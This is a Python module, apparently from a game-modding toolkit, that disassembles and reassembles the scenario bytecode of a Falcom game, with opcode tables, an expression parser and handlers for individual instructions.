InstructionNames[0xC0] = 'SetChrChipPat'
InstructionNames[0xC2] = 'LoadChrChipPat'
InstructionNames[0xC3] = 'OP_C3'
InstructionNames[0xC4] = 'OP_C4'
InstructionNames[0xC5] = 'MiniGame'
InstructionNames[0xC7] = 'OP_C7'
InstructionNames[0xC9] = 'OP_C9'
InstructionNames[0xCA] = 'CreatePortrait'
InstructionNames[0xCB] = 'OP_CB'
InstructionNames[0xCC] = 'OP_CC'
InstructionNames[0xCD] = 'PlaceName2'
InstructionNames[0xCE] = 'PartySelect'
InstructionNames[0xCF] = 'OP_CF'
InstructionNames[0xD0] = 'MenuCmd'
InstructionNames[0xD1] = 'OP_D1'
InstructionNames[0xD2] = 'OP_D2'
InstructionNames[0xD3] = 'OP_D3'
InstructionNames[0xD4] = 'OP_D4'
InstructionNames[0xD5] = 'OP_D5'
InstructionNames[0xD6] = 'LoadChrToIndex'
InstructionNames[0xD7] = 'OP_D7'
InstructionNames[0xD8] = 'OP_D8'
InstructionNames[0xD9] = 'OP_D9'
InstructionNames[0xDA] = 'OP_DA'
InstructionNames[0xDC] = 'OP_DC'
InstructionNames[0xDD] = 'OP_DD'
InstructionNames[0xDE] = 'OP_DE'
InstructionNames[0xDF] = 'LoadAnimeChip'
InstructionNames[0xE0] = 'OP_E0'
InstructionNames[0xE2] = 'OP_E2'
InstructionNames[0xE3] = 'OP_E3'
InstructionNames[0xE4] = 'OP_E4'
InstructionNames[0xE5] = 'OP_E5'
InstructionNames[0xE6] = 'OP_E6'
InstructionNames[0xE7] = 'OP_E7'
InstructionNames[0xE8] = 'OP_E8'
InstructionNames[0xE9] = 'ShowSaveClearMenu'
InstructionNames[0xF0] = 'OP_F0'
InstructionNames[0xF3] = 'OP_F3'
InstructionNames[0xF4] = 'OP_F4'
InstructionNames[0xFA] = 'OP_FA'
InstructionNames[0xFB] = 'OP_FB'
InstructionNames[0xFC] = 'OP_FC'
InstructionNames[0xFD] = 'OP_FD'
InstructionNames[0xFE] = 'OP_FE'
InstructionNames[0xFF] = 'OP_FF'
for op, name in InstructionNames.items():
expr = '%s = 0x%08X' % (name, op)
exec(expr)
def GetItemName(id):
return ItemNameMap[id] if id in ItemNameMap else '0x%X' % id
def GetItemTrueName(id):
return '\'%s\'' % ItemTrueNameMap[id] if id in ItemTrueNameMap else '0x%X' % id
ScpStrCodeMap = {}
ScpStrCodeMap[-1] = 'SCPSTR_CODE_STRING'
ScpStrCodeMap[0x1F] = 'SCPSTR_CODE_ITEM'
ScpStrCodeMap[0x01] = 'SCPSTR_CODE_LINE_FEED'
ScpStrCodeMap[0x02] = 'SCPSTR_CODE_ENTER'
ScpStrCodeMap[0x03] = 'SCPSTR_CODE_CLEAR'
ScpStrCodeMap[0x05] = 'SCPSTR_CODE_05'
ScpStrCodeMap[0x07] = 'SCPSTR_CODE_COLOR'
ScpStrCodeMap[0x09] = 'SCPSTR_CODE_09'
for code, name in ScpStrCodeMap.items():
expr = '%s = %d' % (name, code)
exec(expr)
def GetStrCode(code):
return ScpStrCodeMap[code] if code in ScpStrCodeMap else '0x%X' % code
class ScpString:
def __init__(self, CtrlCode, Value = None):
self.CtrlCode = CtrlCode
self.Value = Value
def binary(self):
pass
def __str__(self):
if self.CtrlCode == SCPSTR_CODE_STRING:
return '"%s"' % self.Value
value = self.Value
code = GetStrCode(self.CtrlCode)
if value == None:
return 'scpstr(%s)' % code
value = GetItemTrueName(value) if self.CtrlCode == SCPSTR_CODE_ITEM else '0x%X' % value
return 'scpstr(%s, %s)' % (code, value)
def BuildStringListFromObjectList(strlist):
s = []
laststrindex = None
for x in strlist:
if x.CtrlCode == SCPSTR_CODE_LINE_FEED or \
x.CtrlCode == SCPSTR_CODE_ENTER or \
x.CtrlCode == SCPSTR_CODE_CLEAR or \
x.CtrlCode == SCPSTR_CODE_05 or \
x.CtrlCode == SCPSTR_CODE_COLOR or \
x.CtrlCode == SCPSTR_CODE_09:
if len(s) != laststrindex:
s.append(str(x))
else:
if x.CtrlCode == SCPSTR_CODE_COLOR:
tmp = '\\x%02X\\x%02X' % (x.CtrlCode, x.Value)
else:
tmp = '\\x%02X' % x.CtrlCode
s[-1] = '"%s%s"' % (s[-1][1:-1], tmp)
elif x.CtrlCode == SCPSTR_CODE_STRING:
s.append(str(x))
laststrindex = len(s)
else:
s.append(str(x))
return s
def FormatFuncString(data, oprfmt, mark_number = None):
entry = data.TableEntry
ins = data.Instruction
txt = [ '', '%s(' % entry.OpName ]
maxlen = 0
for i in range(len(oprfmt)):
opr = oprfmt[i]
if opr != 'S':
paramlist = BuildFormatOperandParameterList([opr], [ins.Operand[i]])
txt.append(' %s,' % entry.FormatAllOperand(paramlist))
#bp()
#txt.append(' 0x%X,' % ins.Operand[i])
else:
strlist = BuildStringListFromObjectList(ins.Operand[i])
if len(strlist) == 1:
s = ' %s' % strlist[0]
if i != len(oprfmt):
s += ','
txt.append(s)
continue
index = 0
txt.append(' (')
for s in strlist:
tmp = ' %s,' % s
if mark_number:
if strlen(tmp) > maxlen:
maxlen = strlen(tmp)
tmp = ljust_cn(tmp, mark_number)
tmp += ' # %d' % index
txt.append(tmp)
index += 1
txt.append(' )')
if mark_number == -1 and maxlen != 0:
return FormatFuncString(data, oprfmt, maxlen + 5)
txt.append(')')
txt.append('')
return txt
class EDAOScenaInstructionTableEntry(InstructionTableEntry):
def __init__(self, op, name = '', operand = NO_OPERAND, flags = 0, handler = None):
super().__init__(op, name, operand, flags, handler)
def WriteOperand(self, data, opr, value):
fs = data.FileStream
labels = data.Instruction.Labels
def wexpr(value):
for expr in value:
expr.WriteExpression(data)
def wstr(value, recursion = False):
if type(value) == str:
value = value.encode(CODE_PAGE)
if not recursion:
value += b'\x00'
elif IsTupleOrList(value):
for x in value:
wstr(x, True)
fs.wbyte(0)
return
fs.write(value)
oprtype = \
{
'E' : wexpr,
'S' : wstr,
'M' : lambda value : fs.wshort(BGMFileIndex(value).Index()),
'T' : lambda value : fs.wushort(ItemTrueNameMap[value] if type(value) == str else value),
}
return oprtype[opr](value) if opr in oprtype else super().WriteOperand(data, opr, value)
def FormatOperand(self, param):
value = param.Value
opr = param.Operand
flags = param.Flags
def formatstr(strlist):
s = BuildStringListFromObjectList(strlist)
if not flags.ArgNewLine:
if len(s) == 0:
return '""'
elif len(s) == 1:
return s[0]
return '(' + ', '.join(s) + ')'
raise Exception('not implement')
def formatbgm(bgm):
bgm = BGMFileIndex(bgm)
return ('"%s"' % bgm.Name()) if not bgm.IsInvalid() else ('0x%08X' % (bgm.Index() & 0xFFFFFFFF))
oprtype = \
{
'E' : lambda : FormatExpressionList(value),
'S' : lambda : formatstr(value),
'M' : lambda : BGMFileIndex(value).param(),
'T' : lambda : GetItemTrueName(value),
}
return oprtype[opr]() if opr in oprtype else super().FormatOperand(param)
def GetOperand(self, opr, fs):
def readstr():
string = []
tmpstr = ''
while True:
buf = fs.read(1)
if buf < b' ':
if tmpstr != '':
string.append(ScpString(SCPSTR_CODE_STRING, tmpstr.replace('\\', '\\\\')))
tmpstr = ''
code = struct.unpack('<B', buf)[0]
if code == 0:
break
strobj = ScpString(code)
if code == SCPSTR_CODE_COLOR:
# dummy byte ?
strobj.Value = fs.byte()
elif code == SCPSTR_CODE_LINE_FEED or code == 0x0A:
# line feed
pass
elif code == SCPSTR_CODE_ENTER:
# need press enter
pass
elif code == SCPSTR_CODE_CLEAR or code == 0x04:
# unknown
pass
elif code == 0x05:
pass
elif code == 0x06:
# unknown
pass
elif code == 0x18:
pass
elif code == SCPSTR_CODE_ITEM:
# item id
strobj.Value = fs.ushort()
string.append(strobj)
continue
elif buf >= b'\x80':
buf += fs.read(1)
tmpstr += buf.decode(self.Container.CodePage)
return string
oprtype = \
{
'S' : readstr,
'M' : lambda : fs.short(),
'T' : lambda : fs.ushort(),
}
return oprtype[opr]() if opr in oprtype else super().GetOperand(opr, fs)
def GetOperandSize(self, opr, fs):
if opr == 'M':
return 2
if opr != 'S':
return super().GetOperandSize(opr, fs)
pos = fs.tell()
self.GetOperand(opr, fs)
oprsize = fs.tell() - pos
fs.seek(pos)
return oprsize
def inst(op, operand = NO_OPERAND, flags = 0, handler = None):
return EDAOScenaInstructionTableEntry(op, InstructionNames[op], operand, flags, handler)
ExpressionOperantions = {}
ExpressionOperantions[0x00] = 'EXPR_PUSH_LONG'
ExpressionOperantions[0x01] = 'EXPR_END'
ExpressionOperantions[0x02] = 'EXPR_EQU'
ExpressionOperantions[0x03] = 'EXPR_NEQ'
ExpressionOperantions[0x04] = 'EXPR_LSS'
ExpressionOperantions[0x05] = 'EXPR_GTR'
ExpressionOperantions[0x06] = 'EXPR_LEQ'
ExpressionOperantions[0x07] = 'EXPR_GE'
ExpressionOperantions[0x08] = 'EXPR_EQUZ'
ExpressionOperantions[0x09] = 'EXPR_NEQUZ_I64'
ExpressionOperantions[0x0A] = 'EXPR_AND'
ExpressionOperantions[0x0B] = 'EXPR_OR'
ExpressionOperantions[0x0C] = 'EXPR_ADD'
ExpressionOperantions[0x0D] = 'EXPR_SUB'
ExpressionOperantions[0x0E] = 'EXPR_NEG'
ExpressionOperantions[0x0F] = 'EXPR_XOR'
ExpressionOperantions[0x10] = 'EXPR_IMUL'
ExpressionOperantions[0x11] = 'EXPR_IDIV'
ExpressionOperantions[0x12] = 'EXPR_IMOD'
ExpressionOperantions[0x13] = 'EXPR_STUB'
ExpressionOperantions[0x14] = 'EXPR_IMUL_SAVE'
ExpressionOperantions[0x15] = 'EXPR_IDIV_SAVE'
ExpressionOperantions[0x16] = 'EXPR_IMOD_SAVE'
ExpressionOperantions[0x17] = 'EXPR_ADD_SAVE'
ExpressionOperantions[0x18] = 'EXPR_SUB_SAVE'
ExpressionOperantions[0x19] = 'EXPR_AND_SAVE'
ExpressionOperantions[0x1A] = 'EXPR_XOR_SAVE'
ExpressionOperantions[0x1B] = 'EXPR_OR_SAVE'
ExpressionOperantions[0x1C] = 'EXPR_EXEC_OP'
ExpressionOperantions[0x1D] = 'EXPR_NOT'
ExpressionOperantions[0x1E] = 'EXPR_TEST_SCENA_FLAGS'
ExpressionOperantions[0x1F] = 'EXPR_GET_RESULT'
ExpressionOperantions[0x20] = 'EXPR_PUSH_VALUE_INDEX'
ExpressionOperantions[0x21] = 'EXPR_GET_CHR_WORK'
ExpressionOperantions[0x22] = 'EXPR_RAND'
ExpressionOperantions[0x23] = 'EXPR_23'
for opr, expr in ExpressionOperantions.items():
exec('EXPR_%02X = 0x%X' % (opr, opr))
exec('%s = 0x%X' % (expr, opr))
class ScpExpression:
def __init__(self, operation = None, operand = None):
self.Operation = operation
self.Operand = operand if operand != None else []
def binary(self):
return b''
def WriteExpression(self, handlerdata):
operation = self.Operation
fs = handlerdata.FileStream
def expr_exec():
handlerdata.Assemble(self.Operand[0])
operationmap = \
{
EXPR_PUSH_LONG : lambda : fs.wulong(self.Operand[0]),
EXPR_TEST_SCENA_FLAGS : lambda : fs.wushort(self.Operand[0]),
EXPR_GET_RESULT : lambda : fs.wushort(self.Operand[0]),
EXPR_PUSH_VALUE_INDEX : lambda : fs.wbyte(self.Operand[0]),
EXPR_23 : lambda : fs.wbyte(self.Operand[0]),
EXPR_GET_CHR_WORK : lambda : fs.write(struct.pack('<HB', *self.Operand)),
EXPR_EXEC_OP : lambda : handlerdata.Assemble(self.Operand[0]),
}
fs.wbyte(operation)
if operation in operationmap:
operationmap[operation]()
def __str__(self):
if self.Operation == EXPR_TEST_SCENA_FLAGS:
offset, bit = SplitScenarioFlags(self.Operand[0])
return 'scpexpr(%s, MakeScenarioFlags(0x%X, %d))' % (ExpressionOperantions[self.Operation], offset, bit)
elif self.Operation != EXPR_EXEC_OP:
txt = 'scpexpr(%s' % ExpressionOperantions[self.Operation]
for opr in self.Operand:
txt += ', 0x%X' % opr
txt += ')'
return txt
from Assembler import Assembler2
asm = Assembler2.Disassembler(edao_op_table)
txt = 'scpexpr(%s' % ExpressionOperantions[self.Operation]
for inst in self.Operand:
data = HandlerData(HANDLER_REASON_FORMAT)
data.Instruction = inst
data.TableEntry = edao_op_table[inst.OpCode]
txt += ', "%s"' % CombineMultiline(asm.FormatInstruction(data))
txt += ')'
return txt
def FormatExpressionList(exprlist):
exprtxt = '%s' % exprlist[0]
for expr in exprlist[1:]:
exprtxt += ', %s' % expr
return '(%s)' % exprtxt
def ParseScpExpression(data):
expr = []
fs = data.FileStream
# stack size == 0xB0 ?
while True:
operation = fs.byte()
scpexpr = ScpExpression(operation)
if operation == EXPR_PUSH_LONG:
scpexpr.Operand.append(fs.ulong())
elif operation == EXPR_END:
break
elif operation == EXPR_EQU or \
operation == EXPR_NEQ or \
operation == EXPR_LSS or \
operation == EXPR_GTR or \
operation == EXPR_LEQ or \
operation == EXPR_GE or \
operation == EXPR_EQUZ or \
operation == EXPR_NEQUZ_I64 or \
operation == EXPR_AND or \
operation == EXPR_OR or \
operation == EXPR_ADD or \
operation == EXPR_SUB or \
operation == EXPR_NEG or \
operation == EXPR_XOR or \
operation == EXPR_IMUL or \
operation == EXPR_IDIV or \
operation == EXPR_IMOD or \
operation == EXPR_STUB or \
operation == EXPR_IMUL_SAVE or \
operation == EXPR_IDIV_SAVE or \
operation == EXPR_IMOD_SAVE or \
operation == EXPR_ADD_SAVE or \
operation == EXPR_SUB_SAVE or \
operation == EXPR_AND_SAVE or \
operation == EXPR_XOR_SAVE or \
operation == EXPR_OR_SAVE or \
operation == EXPR_NOT:
# pop all operand, and push result
pass
elif operation == EXPR_EXEC_OP:
# execute one op code
execdata = data.CreateBranch()
#execdata.Instruction.OpCode = data.TableEntry.Container.GetOpCode(fs)
#execdata.TableEntry = data.TableEntry.Container[execdata.Instruction.OpCode]
execinst = execdata.Disasm(execdata)
scpexpr.Operand.append(execinst)
elif operation == EXPR_TEST_SCENA_FLAGS or \
operation == EXPR_GET_RESULT:
scpexpr.Operand.append(fs.ushort())
elif operation == EXPR_PUSH_VALUE_INDEX:
scpexpr.Operand.append(fs.byte())
elif operation == EXPR_GET_CHR_WORK:
scpexpr.Operand.append(fs.ushort())
scpexpr.Operand.append(fs.byte())
elif operation == EXPR_RAND:
pass
elif operation == EXPR_23:
scpexpr.Operand.append(fs.byte())
expr.append(scpexpr)
expr.append(scpexpr)
return expr
def scp_if(data):
# if (expression)
# goto offset
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
expr = ParseScpExpression(data)
ins.Operand.append(expr)
offset = fs.ulong()
ins.Operand.append(offset)
ins.BranchTargets.append(offset)
ins.OperandFormat = 'EO'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'EO'
return None
SWITCH_DEFAULT = -1
def scp_switch(data):
# switch (expression)
# case option_id:
# goto option_offset;
# default:
# goto default_offset
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
expr = ParseScpExpression(data)
optioncount = fs.byte()
options = []
for i in range(optioncount):
optionid, optionoffset = struct.unpack('<HL', fs.read(6))
options.append((optionid, optionoffset))
ins.BranchTargets.append(optionoffset)
defaultoffset = fs.ulong()
ins.BranchTargets.insert(0, defaultoffset)
ins.Operand.append(expr)
ins.Operand.append(options)
ins.Operand.append(defaultoffset)
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
# switch(
# Expression,
# (CaseID, CaseLabel),
# (CaseID, CaseLabel),
# (CaseID, CaseLabel),
# (-1, DefaultLabel)
# )
ins = data.Instruction
entry = data.TableEntry
txt = []
txt.append('%s(' % entry.OpName)
txt.append(' %s,' % FormatExpressionList(ins.Operand[0]))
GetLabelName = entry.Container.GetLabelName
#txt.append(' (')
for case in ins.Operand[1]:
txt.append(' (%d, "%s"),' % (case[0], GetLabelName(case[1])))
txt.append(' (SWITCH_DEFAULT, "%s"),' % GetLabelName(ins.Operand[-1]))
#txt.append(' )')
txt.append(')')
txt.append('')
return txt
elif data.Reason == HANDLER_REASON_ASSEMBLE:
fs = data.FileStream
args = data.Arguments
entry = data.TableEntry
inst = data.Instruction
exprlist = args[0]
optlist = args[1:]
opts = []
defaultoffset = None
for opt in optlist:
if opt[0] == SWITCH_DEFAULT:
if defaultoffset != None:
raise Exception('multi default case')
defaultoffset = opt[1]
else:
opts.append(opt)
optlist = opts
entry.Container.WriteOpCode(fs, inst.OpCode)
for expr in exprlist:
expr.WriteExpression(data)
entry.WriteOperand(data, 'B', len(optlist))
for opt in optlist:
fs.wushort(opt[0])
inst.Labels.append(LabelEntry(opt[1], fs.tell()))
fs.wulong(INVALID_OFFSET)
inst.Labels.append(LabelEntry(defaultoffset, fs.tell()))
fs.wulong(INVALID_OFFSET)
return inst
def scp_new_scene(data):
if data.Reason == HANDLER_REASON_DISASM:
data.Instruction.OperandFormat = 'LCCC'
elif data.Reason == HANDLER_REASON_FORMAT:
ins = data.Instruction
symbol = '%s("%s", %d, %d, %d)' % (
data.TableEntry.OpName, ScenarioFileIndex(ins.Operand[0]).Name(),
ins.Operand[1], ins.Operand[2], ins.Operand[3]
)
return [symbol]
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Arguments[0] = ScenarioFileIndex(data.Arguments[0]).Index()
data.Instruction.OperandFormat = 'LCCC'
def scp_battle(data):
operand_with_battle_info = 'OLBWWW'
operand_without_battle_info = 'LLS' + ('L' * 4) + ('L' * 8) + 'WW'
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
entry = data.TableEntry
BattleInfoOffset, opr2 = entry.GetAllOperand('LL', fs)
ins.Operand.append(BattleInfoOffset)
ins.Operand.append(opr2)
if BattleInfoOffset != 0xFFFFFFFF:
ins.Operand.append(fs.byte())
ins.Operand.append(fs.ushort())
ins.Operand.append(fs.ushort())
ins.Operand.append(fs.ushort())
ins.BranchTargets.append(BattleInfoOffset)
ins.OperandFormat = operand_with_battle_info
return ins
name = entry.GetOperand('S', fs)
ins.Operand.append(name)
for i in range(4):
ins.Operand.append(fs.ulong())
for i in range(8):
ins.Operand.append(fs.ulong())
ins.Operand += entry.GetAllOperand('WW', fs)
ins.OperandFormat = operand_without_battle_info
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
ins = data.Instruction
entry = data.TableEntry
BattleInfoOffset = ins.Operand[0]
if BattleInfoOffset == 0xFFFFFFFF:
return
p = '%s("BattleInfo_%X", ' % (entry.OpName, BattleInfoOffset)
paramlist = BuildFormatOperandParameterList(
ins.OperandFormat[1:],
ins.Operand[1:],
ins.Flags,
data.LabelMap
)
return [p + entry.FormatAllOperand(paramlist) + ')']
elif data.Reason == HANDLER_REASON_ASSEMBLE:
ins = data.Instruction
BattleInfoOffset = data.Arguments[0]
ins.OperandFormat = operand_with_battle_info if type(BattleInfoOffset) == str else operand_without_battle_info
# SetBarrier(op_0, id, type, 0, x, z, y, cx, cy, degree * 1000)
# op: 0 = create
# type: 1 = line, 2 = circle
def scp_1d(data):
def getopr(opr1):
operand = ''
if opr1 == 0:
operand = 'BBiiiiii'
elif opr1 == 2 or opr1 == 3:
operand = 'B'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr1, opr2 = data.TableEntry.GetAllOperand('BB', fs)
ins.Operand.append(opr1)
ins.Operand.append(opr2)
operand = getopr(opr1)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'BB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
opr1 = data.Arguments[0]
operand = getopr(opr1)
data.Instruction.OperandFormat = 'BB' + operand
def scp_29(data):
def getopr(opr2):
operand = ''
if opr2 == 1 or opr2 == 2:
operand = 'W'
elif opr2 == 3 or opr2 == 4:
operand = 'B'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr1, opr2 = data.TableEntry.GetAllOperand('WB', fs)
ins.Operand.append(opr1)
ins.Operand.append(opr2)
operand = getopr(opr2)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'WB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WB' + getopr(data.Arguments[1])
def scp_2a(data):
def getopr(opr2): return 'W' if opr2 == 1 else 'B'
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr1, opr2 = data.TableEntry.GetAllOperand('WB', fs)
ins.Operand.append(opr1)
ins.Operand.append(opr2)
operand = getopr(opr2)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'WB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
opr2 = data.Arguments[1]
data.Instruction.OperandFormat = 'WB' + getopr(opr2)
def scp_2b(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
for i in range(0xC):
opr = fs.ushort()
ins.Operand.append(opr)
if opr == 0xFFFF:
break
ins.OperandFormat = 'W' * len(ins.Operand)
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'W' * min(0xC, len(data.Arguments))
def scp_38(data):
def getopr(opr2):
operand = ''
if opr2 == 0x7F:
operand = 'B'
elif opr2 >= 0x80 and opr2 <= 0x87:
operand = 'B'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr1, opr2 = data.TableEntry.GetAllOperand('BB', fs)
ins.Operand.append(opr1)
ins.Operand.append(opr2)
operand = getopr(opr2)
if opr2 == 0x7F:
operand = 'B'
elif opr2 >= 0x80 and opr2 <= 0x87:
operand = 'B'
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'BB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BB' + getopr(data.Arguments[1])
def scp_lambda_worker(data, extra_length):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
target, tid, length = data.TableEntry.GetAllOperand('WBB', fs)
length += extra_length
pos = fs.tell()
block = data.DisasmBlock(pos, length)
fs.seek(pos + length)
ins.Operand = [target, tid, block]
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
'''
def lambda_xxx():
OP_97(0xFE, 0x7D0, 0x0, 0x0, 0x7D0, 0x0)
OP_00()
X(ChrId, ChrThreadId, lambda_xxx)
'''
ins = data.Instruction
entry = data.TableEntry
target, tid, lambdablock = ins.Operand
lambda_name = 'lambda_%X' % lambdablock.Offset
txt = ['', 'def %s():' % lambda_name]
for inst in lambdablock.Instructions:
lambdadata = data.CreateBranch()
lambdadata.Instruction = inst
lambdabody = lambdadata.Format(lambdadata)
for i in range(len(lambdabody)):
if lambdabody[i] == '':
continue
lambdabody[i] = ' ' + lambdabody[i]
txt += lambdabody
txt.append('')
txt.append('%s(0x%X, %d, %s)' % (data.TableEntry.OpName, target, tid, lambda_name))
return txt
elif data.Reason == HANDLER_REASON_ASSEMBLE:
fs = data.FileStream
entry = data.TableEntry
inst = data.Instruction
target, tid, lambdafunc = data.Arguments
entry.Container.WriteOpCode(fs, inst.OpCode)
entry.WriteOperand(data, 'W', target)
entry.WriteOperand(data, 'B', tid)
fs.seek(1, io.SEEK_CUR)
pos = fs.tell()
lambdafunc()
pos2 = fs.tell()
if pos2 - pos > 0xFF:
raise Exception('lambda must be smaller than 0x100 bytes: current = %X' % (pos2 - pos))
fs.seek(pos - 1)
entry.WriteOperand(data, 'B', pos2 - pos - extra_length)
fs.seek(pos2)
return inst
def scp_46(data):
return scp_lambda_worker(data, 1) # ExitThread
def scp_47(data):
return scp_lambda_worker(data, 1 + 5) # Yield, Jump(Offset)
def scp_4e(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('W', fs)
ins.Operand.append(ParseScpExpression(data))
ins.OperandFormat = 'WE'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WE'
def scp_50(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand.append(fs.byte())
ins.Operand.append(ParseScpExpression(data))
ins.OperandFormat = 'BE'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BE'
def scp_52(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('WB', fs)
ins.Operand.append(ParseScpExpression(data))
ins.OperandFormat = 'WBE'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WBE'
def scp_anonymous_talk(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
target, text = data.TableEntry.GetAllOperand('WS', fs)
ins.Operand.append(target)
ins.Operand.append(text)
ins.OperandFormat = 'WS'
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
return FormatFuncString(data, data.Instruction.OperandFormat)
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WS'
def scp_create_chr_talk(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('WS', fs)
ins.OperandFormat = 'WS'
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
return FormatFuncString(data, data.Instruction.OperandFormat)
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WS'
def scp_create_npc_talk(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
target, name, text = data.TableEntry.GetAllOperand('WSS', fs)
ins.Operand.append(target)
ins.Operand.append(name)
ins.Operand.append(text)
ins.OperandFormat = 'WSS'
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
return FormatFuncString(data, data.Instruction.OperandFormat)
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WSS'
def scp_create_menu(data):
# max 10 line ?
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('hhhc', fs)
menuitems = data.TableEntry.GetOperand('S', fs)
ins.Operand.append(menuitems)
ins.OperandFormat = 'hhhcS'
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
return FormatFuncString(data, data.Instruction.OperandFormat, -1)
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'hhhcS'
def scp_76(data):
def getopr(opr3):
operand = ''
if opr3 == 0 or \
opr3 == 1 or \
opr3 == 3:
operand = 'L'
elif opr3 == 2:
operand = 'S'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('BSB', fs)
opr3 = ins.Operand[2]
operand = getopr(opr3)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'BSB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
opr3 = data.Arguments[2]
data.Instruction.OperandFormat = 'BSB' + getopr(opr3)
def scp_set_event_skip(data):
if data.Reason == HANDLER_REASON_DISASM:
ins = data.Instruction
fs = data.FileStream
cleareventskip, offset = data.TableEntry.GetAllOperand('BL', fs)
ins.OperandFormat = 'BL' if cleareventskip else 'BO'
ins.Operand = [cleareventskip, offset]
if not cleareventskip:
ins.BranchTargets.append(offset)
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
ins = data.Instruction
cleareventskip, offset = data.Arguments[0], data.Arguments[1]
ins.OperandFormat = 'BL' if cleareventskip else 'BO'
def scp_9f(data):
def getopr(opr):
if opr == 0:
operand = 'W'
elif opr == 1:
operand = 'iii'
else:
operand = 'WiB'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('B', fs)
opr = ins.Operand[0]
operand = getopr(opr)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'B' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'B' + getopr(data.Arguments[0])
def scp_a1(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
ins.Operand = data.TableEntry.GetAllOperand('WWB', fs)
operand = 'B' * ins.Operand[-1]
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'WWB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WWB' + 'B' * (len(data.Arguments) - 3)
return None
def MakeScenarioFlags(offset, bit):
return (offset << 3) | (bit & 7)
def SplitScenarioFlags(flags):
return (flags >> 3), (flags & 7)
def scp_set_scenario_flags(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
offset, bit = SplitScenarioFlags(data.TableEntry.GetOperand('W', fs))
ins.Operand = [offset, bit]
ins.OperandFormat = 'WC'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'W'
if len(data.Arguments) == 2:
offset, bit = data.Arguments[0], data.Arguments[1]
if offset >= 0x220:
raise Exception('offset must be less than 0x220')
data.Arguments = [MakeScenarioFlags(offset, bit)]
def scp_clear_scenario_flags(data):
return scp_set_scenario_flags(data)
def scp_cf(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
operand = 'BB'
ins.Operand = data.TableEntry.GetAllOperand(operand, fs)
if ins.Operand[0] != 0:
ins.Operand += data.TableEntry.GetAllOperand('B', fs)
operand += 'B'
ins.OperandFormat = operand
